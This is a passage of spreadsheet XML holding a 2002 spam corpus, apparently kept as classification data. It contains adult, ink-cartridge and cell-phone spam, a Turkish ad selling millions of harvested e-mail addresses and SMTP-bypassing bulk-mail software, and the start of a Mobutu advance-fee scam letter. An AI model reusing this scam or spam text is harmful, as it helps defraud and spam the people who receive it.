    <t>Below is the result of your feedback form.  It was submitted by  (Pamela@Blinkese.com) on Thursday, July 25, 2002 at 10:49:57 --------------------------------------------------------------------------- : CLICK HERE FOR SOME OF THE BEST AND NASTIEST XXX ON THE NET! YOU DONT EVEN NEED A CREDIT CARD! ---------------------------------------------------------------------------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486</t>
  </si>
  <si>
    <t>To: vtcl-user@example.sourceforge.net\nFrom: "TR Posta NetWorks" &lt;3center@tr.net.tr&gt;\nDate: Thu, 25 Jul 2002 10:31:20 +0300</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 10:31:20 +0300</t>
  </si>
  <si>
    <t>"TR Posta NetWorks" &lt;3center@tr.net.tr&gt;</t>
  </si>
  <si>
    <t>vtcl-user@example.sourceforge.net</t>
  </si>
  <si>
    <t>[WM] BiLiYORUZ REKLAMA iHTiYACINIZ VAR! BUNUN iCiN BURADAYIZ.. 25.07.2002 10:31:20</t>
  </si>
  <si>
    <t>=3Chtml=3E=3Chead=3E=3Cmeta http-equiv=3DContent-Language content=3Dtr=3E=3Cmeta http-equiv=3DContent-Type content=3D=22text=2Fhtml=3B charset=3Dwindows-1254=22=3E=3Ctitle=3ETR Rehber 6=3C=2Ftitle=3E=3C=2Fhead=3E\n=3Cbody background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=3E=22 topmargin=3D1 leftmargin=3D1 bgcolor=3D=22#CECFFF=22=3E\n      =3Cp align=3D=22center=22=3E\n      =3Cimg border=3D=222=22 src=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fbanner1=2Egif=22 align=3D=22center=22 width=3D=22610=22 height=3D=2281=22=3E=3Cdiv align=3D=22center=22=3E\n  =3Ccenter=3E\n  =3Ctable border=3D1 cellspacing=3D1 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D612 id=3DAutoNumber1 height=3D77 bgcolor=3D=22#CECFFF=22 background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=22=3E=3Ctr=3E\n    =3Ctd width=3D606 height=3D16 bgcolor=3D=22#00FFFF=22=3E=3Cp align=3Dcenter=3E=3Cb=3E=3Cfont face=3DArial color=3D=22#FF0000=22=3E =3Cmarquee scrolldelay=3D100 scrollamount=3D9=3EREKLAMLARINIZA SERVET =D6DEMEYiN!!! UCUZ=2C KOLAY VE KALICI REKLAMLARINIZ iCiN BiZi ARAYINIZ=2E=2E=2E=3C=2Fmarquee=3E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E\n      =3Ctd width=3D606 height=3D43 bgcolor=3D=22#00FFFF=22=3E=3Cp align=3Dcenter=3E=3Cfont face=3DTahoma size=3D2 color=3D=22#000000=22=3E\n      =3Cbr=3E\n    Bu ileti size islerinizi kolaylastirmak=2C satislarinizi arttirmak=2C kisacasi \n  milyonlara sesinizi duyurmak icin g=F6nderilmistir=2E Bu t=FCrden tanitimlarla \n  ilgilenmiyorsaniz bu iletiyi=2C &amp;quot=3Bilgilenecegini d=FCs=FCnd=FCg=FCn=FCz&amp;quot=3B tanidiklariniza \n  g=F6nderiniz=2E Bu iletinin size ve tanidiklariniza kazandiracaklarina \n  inanamayacaksiniz!=2E=3Cbr=3EHerseye ragmen bizden e-mail almak istemiyor ve satisa sundugumuz=3Cbr=3E&amp;nbsp=3Blistelerden cikmak istiyorsaniz \n  bu iletiyi bos olarak cevaplamaniz yeterli olacaktir=2E=3Cbr=3E\n  T=FCm =F6nerilerinizi dikkate alip degerlendiriyoruz=2E=2E L=FCtfen olumlu olumsuz \n  elestirileriniz icin web sayfamizdaki iletisim formunu kullaniniz=2E=2E=3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E\n      =3Ctd width=3D606 height=3D1 bgcolor=3D=22#000000=22 bordercolorlight=3D=22#00FFFF=22 bordercolordark=3D=22#C0C0C0=22=3E\n      =3Cb=3E=3Cfont color=3D=22#96B4D8=22 face=3D=22Verdana=22=3E\n      =3Cmarquee scrolldelay=3D=2252=22 scrollamount=3D=225=22=3ETR Rehber 8=2E0 G=FCncellenme Tarihi 10 Temmuz 2002'dir=2E=2E TR Rehber ve World Rehberi aldiginizda bir sonraki g=FCncellemede&amp;nbsp=3B herhangi bir =FCcret =F6demeyeceksiniz=2E=2E Daha =F6nceden alis-veris de bulundugumuz m=FCsterilerimize %50 indirim imkani sunuyoruz=2E=2E=3C=2Fmarquee=3E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n      =3C=2Ftr=3E=3Ctr=3E=3Ctd width=3D606 height=3D184 align=3D=22center=22=3E\n      &amp;nbsp=3B=3Cdiv align=3D=22center=22=3E\n        =3Ccenter=3E\n        =3Ctable border=3D=221=22 cellpadding=3D=220=22 cellspacing=3D=220=22 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D=2290%=22 id=3D=22AutoNumber4=22 height=3D=2220=22=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E\n      =3Cp align=3D=22center=22=3E=3Cu=3E=3Cfont color=3D=22#0000FF=22 size=3D=224=22=3E=3Cb=3E=2E=3A=3ARehberlerimizin Ortak \n      =D6zellikleri=3A=3A=2E=3C=2Fb=3E=3C=2Ffont=3E=3C=2Fu=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E=3Cfont face=3DVerdana size=3D2=3E\n            Detayli kategorili =3B daha fazla bilgi i=E7in web sayfam=FDzi ziyaret \n            ediniz=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E=3Cfont face=3D=22Verdana=22 size=3D=222=22=3E\n            ilave programlar =3B mailling i=E7in min=2E d=FCzeyde programlar=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=2210=22 colspan=3D=223=22=3E=3Cfont face=3DVerdana size=3D2=3E\n            Kullanimi kolayla=FEt=FDr=FDc=FD t=FCrk=E7e d=F6k=FCman ve video format=FDnda \n            a=E7=FDklamalar=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=229=22 colspan=3D=223=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3ESanayi Rehberi =3Cu=3E\n            =3Cfont color=3D=22#FF0000=22=3E=3Cb=3EHediyeli=2E=2E=3C=2Fb=3E=3C=2Ffont=3E=3C=2Fu=3E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=229=22 colspan=3D=223=22=3E\n      =3Cp align=3D=22center=22=3E\n  =3Cb=3E \n  =3Cfont face=3DVerdana size=3D=222=22=3E800=2E000 =3C=2Ffont=3E=3C=2Fb=3E \n  =3Cfont face=3DVerdana size=3D=222=22=3EArama Motoruna =3Cb=3E=3Cfont color=3D=22#FF0000=22=3E =3Cu=3E=FCcretsiz=3C=2Fu=3E=3C=2Ffont=3E=3C=2Fb=3E kay=FDt \n  imkan=FD=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E** SINIRSIZ telefon=2C e-mail ve icq ile \n            destek garantisi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ETR Rehber 8=2E5=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E400=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E\n    =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E6=2E000=2E000 T=FCrk e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ETR Rehber 7=2E0=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E350=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E\n    =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E4=2E000=2E000 T=FCrk e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ETR Rehber =D6zel=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22 bgcolor=3D=22#FFFF00=22=3E\n            =3Cb=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3E250=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E\n    =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E2=2E000=2E000 Firma bazl=FD e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3EWorld Rehber 2=2E5=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E350=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E=3Cp style=3D=22margin-left=3A -6=22=3E=3Cfont face=3DVerdana size=3D2=3E\n            150=2E000=2E000 yabanci e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3EICQ Rehber =D6zel=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E150=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E2=2E500=2E000 T=FCrk ICQ kullan=FDc=FDsi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ESanayi Rehberi=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E50=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E\n            =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=222=22=3ET=FCrkiye deki t=FCm firmalar=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=221=22 colspan=3D=223=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=221=22=3E&amp;nbsp=3B=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=221=22=3E* TR ve WORLD Rehber birlikte \n            aldiginizda Hotmail Kullanici listesini =3Cu=3E=3Cfont color=3D=22#FF0000=22=3E\n            =3Cb=3EHEDiYE=3C=2Fb=3E=3C=2Ffont=3E=3C=2Fu=3E ediyoruz=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E\n            =3Cfont face=3D=22Verdana=22 size=3D=221=22=3E* Eski m=FCsterilerimize %50 indirimimiz \n            devam etmektedir=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n          =3Ctr=3E\n            =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E\n            =3Cfont size=3D=221=22 face=3D=22Verdana=22=3E* Not=3A Fiyatlara KDV ve Kargo =FCcreti \n            dahil edilmemi=FEtir=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E\n          =3C=2Ftr=3E\n        =3C=2Ftable=3E\n        =3C=2Fcenter=3E\n      =3C=2Fdiv=3E\n&amp;nbsp=3B=3C=2Ftd=3E\n      =3C=2Ftr=3E=3Ctr=3E\n      =3Ctd width=3D606 height=3D1 bgcolor=3D=22#00FFFF=22=3E=3Cp align=3Dcenter=3E=3Cb=3E\n    =3Cfont face=3DVerdana color=3D=22#FFFFFF=22=3E =3Cspan style=3D=22background-color=3A #FF0000=22=3E\n      =3Cfont size=3D=222=22=3ETR 8=2E0 ve World Rehber birlikte sadece 750=2E000=2E000 TL=2EYerine =3C=2Ffont=3E\n      600=2E000=2E000 TL=2E=3C=2Fspan=3E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E=3C=2Ftr=3E=3C=2Ftable=3E=3C=2Fcenter=3E\n=3C=2Fdiv=3E\n=3Cdiv align=3Dcenter=3E=3Ccenter=3E\n  =3Ctable border=3D1 cellspacing=3D1 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D612 id=3DAutoNumber1 height=3D149 bgcolor=3D=22#CECFFF=22 background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=22=3E=3Ctr=3E\n      =3Ctd width=3D606 height=3D1 bgcolor=3D=22#00FFFF=22=3E\n    =3Cp align=3Dleft=3E&amp;nbsp=3B=3Cul style=3D=22margin-top=3A -8=22=3E\n      =3Cli style=3D=22line-height=3A 100%=22=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E =3Cfont face=3DVerdana size=3D1=3EG=FCncelleme islemlerinde \n      ki indirim oran=FDm=FDz %50'dir=2E =3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Dleft style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E\n      =3Cb=3E =3Cfont face=3DVerdana size=3D2 color=3D=22#FF0000=22=3E\n      800=2E000 Arama motoruna kayit islemi 30=2E000=2E000TL + KDV =3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3DVerdana size=3D1 color=3D=22#000000=22=3ET=FCm \n      versiyonlarimizda g=F6nderim islemi icin gerekli ve en kullanisli programlar \n      bulunmaktadir=2E=3C=2Ffont=3E=3Cfont face=3DVerdana size=3D1=3E Bu programlarin video \n      formatinda aciklamalari da CD'ler icerisinde bulunmaktadir=2E=2E=2E=3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3EBu programlar sizin \n      iletilerinizi kolay bir sekilde g=F6ndermenizi saglarken=2C iletilerinizi \n      alan kisilerin kullandigi serverlarin da yorulmamasini=28karsi tarafta problem \n      yaratilmamasini=29 saglayacaktir=2E=2E=2E=3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E\n      =3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3EBu programlar ISP yada hosting firmanizin \n      SMTP serverini kullanmaniza gerek kalmadan direkt g=F6nderim yapabilmenizi \n      saglayacaktir=2E isterseniz bir checkbox'i isaretliyerek kullanmak \n      istediginiz SMTP server ile&amp;nbsp=3B fault-tolerance yaparak g=F6nderdiginiz \n      iletilerin %100 yerine ulasmasini saglayabilirsiniz=2E=2E=2E=3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E\n      =3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3ESMTP server kullanmadan g=F6nderdiginiz \n      mesajlar bilinenin aksine daha basarili g=F6nderim yapacakdir=2E C=FCnk=FC \n      mesajlarin yerine ulasip ulasmadigini g=F6r=FCp m=FCdahele yapmak sizin elinizde \n      olacaktir=2E=2E=2E=3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E\n      =3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3EAyrica bu programlar HTML formatinda \n      mesaj g=F6nderimini de desteklemektedir=2E Bu destek sayesinde renkli=2C resimli \n      daha g=F6rsel ve dikkat cekici iletiler g=F6nderebilirsiniz=2E=2E=2E=3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3DVerdana size=3D1=3ECD icerisindeki b=FCy=FCk e-mail \n      listelerini kolayca d=FCzenleyebileceginiz=2C istenmeyen e-mail adreslerini \n      otomatik olarak silebileceginiz ve her t=FCrl=FC kategoriye ayirabileceginiz \n      programlar da =FCcretsiz olarak verilmektedir=2E=2E=2E=3Cbr=3E\n&amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n      =3Cli=3E\n      =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3ETR rehber ve World \n      Rehberi birlikte aldiginizda=2C bir sonraki g=FCncel versiyonlari adresinize \n      =FCcretsiz g=F6nderiyoruz=2E=2E=2E Bunun icin l=FCtfen g=FCncelleme maili aldiginizda \n      bize geri d=F6n=FCn=FCz=2E=2E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E\n    =3C=2Ful=3E\n    =3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E=3Ctd width=3D606 height=3D1 bgcolor=3D=22#00FFFF=22=3E\n    =3Cp align=3D=22center=22=3E=3Cfont face=3DVerdana=3E=3Cb=3E=2E=3A=3A \n  HEDEF KiTLE TESPiDi =3A=3A=2E=3Cbr=3E=3C=2Fb=3E=3Ci=3E=3Cfont size=3D=222=22=3EHedef kitlenize ulasmanizi sa=F0layaci=F0imiz bu \n    =F6zel y=F6ntem hakkinda mutlaka bilgi isteyiniz=2E=2E=3Cbr=3E\n    =3C=2Ffont=3E=3C=2Fi=3E\n  =3Cb=3E=2E=3A=3A TARGET MAILLING =3A=3A=2E=3C=2Fb=3E=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3C=2Ftable=3E=3C=2Fcenter=3E=3C=2Fdiv=3E=3Cdiv align=3Dcenter=3E=3Ccenter=3E\n  =3Ctable border=3D1 cellpadding=3D2 cellspacing=3D1 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D612 id=3DAutoNumber3 height=3D131 bgcolor=3D=22#CECFFF=22 background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=22=3E=3Ctr=3E\n    =3Ctd width=3D607 height=3D20 bgcolor=3D=22#00FFFF=22=3E\n  =3Cp align=3D=22center=22=3E=3Cu=3E=3Cb=3Eiletisim Bilgileri =3A =28 Pazar haric herg=FCn 09=3A00 ile 19=3A30 arasi=29=3C=2Fb=3E=3C=2Fu=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E\n      =3Ctd width=3D607 height=3D52=3E=3Cp align=3Dcenter=3E=3Cfont face=3DVerdana size=3D=224=22=3E\n      =3Cspan style=3D=22background-color=3A #FF0000=22=3EGSM=3A+ 90 535 482=2E97=2E19&amp;nbsp=3B G=F6khan \n      ATASOY=3Cbr=3E\n      =3Cfont color=3D=22#FFFF00=22=3E\n      =3Cmarquee width=3D=22386=22=3ETAKLiTLERiMiZDEN SAKININ=2C GARANTiSi OLMAYAN =FCR=FCNLER=2C HiZMETLER KARiYERiNiZi ZEDELEYEBiLiR=2E=2E=3C=2Fmarquee=3E=3C=2Ffont=3E=3C=2Fspan=3E=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E=3Ctd width=3D607 height=3D109=3E=3Cp align=3Dcenter=3E=3Cb=3E =3Cfont face=3D=22Verdana=2C Arial=2C Helvetica=2C sans-serif=22 color=3D=22#FF0000=22=3E&amp;nbsp=3BG=FCn=FCm=FCz \n  T=FCrkiye'sinde internet \n  araciligiyla yapilan reklamlar hizla artmaktadir=2E T=FCrkiye'de ve d=FCnyada bircok \n  firma bu y=F6ntemlerle kendini tanitmaktadir=2EBu artisin icinde sizin de yeralmaniz \n  kacinilmaz bir gercek olacaktir=2E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E\n      =3Ctd width=3D607 height=3D1=3E=3Cp align=3Dcenter=3E=3Cfont face=3DTahoma size=3D2 color=3D=22#000000=22=3EHerseye ragmen bizden e-mail almak istemiyor ve satisa sundugumuz=3Cbr=3E\n      &amp;nbsp=3Blistelerden cikmak istiyorsaniz =3C=2Ffont=3E=3Cb=3E\n      =3Ca href=3D=22mailto=3Auyeiptal=40gmx=2Enet=22=3Euyeiptal=40gmx=2Enet=3C=2Fa=3E=3C=2Fb=3E=3Cfont face=3D=22Arial=22 color=3D=22#ffffff=22 size=3D=222=22=3E=3Cb=3E&amp;nbsp=3B\n      =3C=2Fb=3E=3C=2Ffont=3E=3Cfont face=3DTahoma size=3D2 color=3D=22#000000=22=3Eadresine bo=FE bir mail g=F6ndermeniz yeterli olacakd=FDr=2E=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3C=2Ftable=3E=3C=2Fcenter=3E=3C=2Fdiv=3E\n=3C=2Fbody=3E=3C=2Fhtml=3E\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: Jabber - The world's fastest growing \nreal-time communications platform! Don't just IM. Build it in! \n[URL]http://www.jabber.com[/URL]\n_______________________________________________\nwebmake-talk mailing list\nwebmake-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>5523</t>
  </si>
  <si>
    <t>To: &lt;uncledon@notruf.com&gt;, &lt;atsuko1226@aol.com&gt;\nFrom: czanik@hotmail.com\nDate: Thu, 25 Jul 2002 09:14:01 -1600</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 09:14:01 -1600</t>
  </si>
  <si>
    <t>czanik@hotmail.com</t>
  </si>
  <si>
    <t>&lt;uncledon@notruf.com&gt;, &lt;atsuko1226@aol.com&gt;</t>
  </si>
  <si>
    <t>Make your prints beautiful &amp; SAVE BIG!            14144</t>
  </si>
  <si>
    <t>| **&lt; = font face=3D"Verdana" size=3D"3" color=3D"#000000"&gt;Do you Have an Inkjet or Laser Printer?**   ---      **Yes? The= n we can SAVE you $$$=  Money!&lt;= /b&gt; **Ou= r High Quality Ink &amp; Toner Cartridges come with a money-back guarantee, a 1-yea= r Warranty*, and get __FREE 3-Day SHIPPING_!*_** **and best= of all...They Cost up to = 80%  __Less=__ than Retail Price!** ***= Click here to visit Our Website!***      ---      **_or Call us Toll-Free @ 1-800-758-8084!_** *90-day warra= nty on remanufactured cartridges. Free shipping on orders over $40         You are receiving this special offer because you have provided=  permission to receive email communications regarding speci= al online promotions or offers. If you feel you have received= this message in error, or wish to be removed from our subscribe= r list, Click HERE and then click send, and you will be removed within three = business days. Thank You and we apologize for ANY inconvenience.   ---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465</t>
  </si>
  <si>
    <t>To: &lt;cypherpunks@einstein.ssz.com&gt;\nFrom: qdaaobwe@national-adv.com\nDate: Thu, 25 Jul 2002 08:54:14 +1000</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 08:54:14 +1000</t>
  </si>
  <si>
    <t>qdaaobwe@national-adv.com</t>
  </si>
  <si>
    <t>BOOST Your Cell Phone!</t>
  </si>
  <si>
    <t>SAY GOODBYE  TO Dropped calls Forever! New Technological Breakthrough  for Cell Phones, Pcs Phones and Cordless Phones! Special Members Only Deal!!   They Will Sell Out Fast!!! Click Here Now And end dropped calls FOREVER!  CLick Here To Unsubscribe From Our Mailing List qdaaobwe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482</t>
  </si>
  <si>
    <t>To: tamkomobutu@diplomats.com\nFrom: &lt;tamkomobutu@eircom.net&gt;\nDate: Thu, 25 Jul 2002 06:18:50 +0100</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 06:18:50 +0100</t>
  </si>
  <si>
    <t>&lt;tamkomobutu@eircom.net&gt;</t>
  </si>
  <si>
    <t>tamkomobutu@diplomats.com</t>
  </si>
  <si>
    <t>PLEASE, ASSISST.</t>
  </si>
  <si>
    <t>HELLO,\n\nI AM A CITIZEN OF ZAIRE, SON OF THE LATE FORMER\nPRESIDENT OF ZAIRE (PRESIDENT MOBUTU SESE SEKO)\nSINCE THE DEATH OF MY LATE FATHER SOME YEARS AGO I HAVE\nBEEN RESIDING IN SOUTH AFRICA ON TEMPORARY POLITICAL ASYLUM. ON MY ARRIVALIN SOUTH AFRICA AFTER MY LATE FATHER'S BURIAL, I CAME IN WITH A DIPLOMATIC\nPACKAGED CONSIGNMENT CONTAINING THE SUM OF $8,000,000.00 (EIGHT MILLION UNITED STATES DOLLARS) WHICH I GOT FROM PART OF THE MONEY MY LATE FATHER MADE THROUGH DIAMONDS SALES WHEN HE WAS THE PRESIDENT OF ZAIRE FOR ABOUT 32 YEARS.PRECISELY, SINCE MY ARRIVAL WITH THE DIPLOMATIC PACKAGED CONSIGNMENT IT HAS BEEN SAFELY KEPT WITH A SECURITY COMPANY HERE IN SOUTH AFRICA.\nI DO NOT WANT TO INVEST THIS MONEY IN ANY PART OF\nAFRICA DUE TO THE CONSTANT POLITICAL INSTABILITY IN\nAFRICA.MY PLAN IS TO USE THIS MONEY TO INVEST IN A\nPROFITABLE BUSINESS IN ANY PART OF THE WORLD APART\nFROM AFRICA, ALSO TO PURCHASE A RESIDENTIAL\nACCOMMODATION. I WILL COME OVER AND SETTLE THERE\nWITH MY FAMILY. HENCE,I AM SOLICITING FOR YOUR\nASSISTANCE AS MY FOREIGN PARTNER TO RECEIVE THIS\nMONEY ON MY BEHALF ON ARRIVAL ABROAD AND TO KEEP IT\nIN A SAFE PLACE PENDING MY ARRIVAL TO JOIN YOU UP.\nUPON THE RECEIPT OF YOUR ACCEPTANCE TO MY PROPOSAL, I CAN IMMEDIATELY 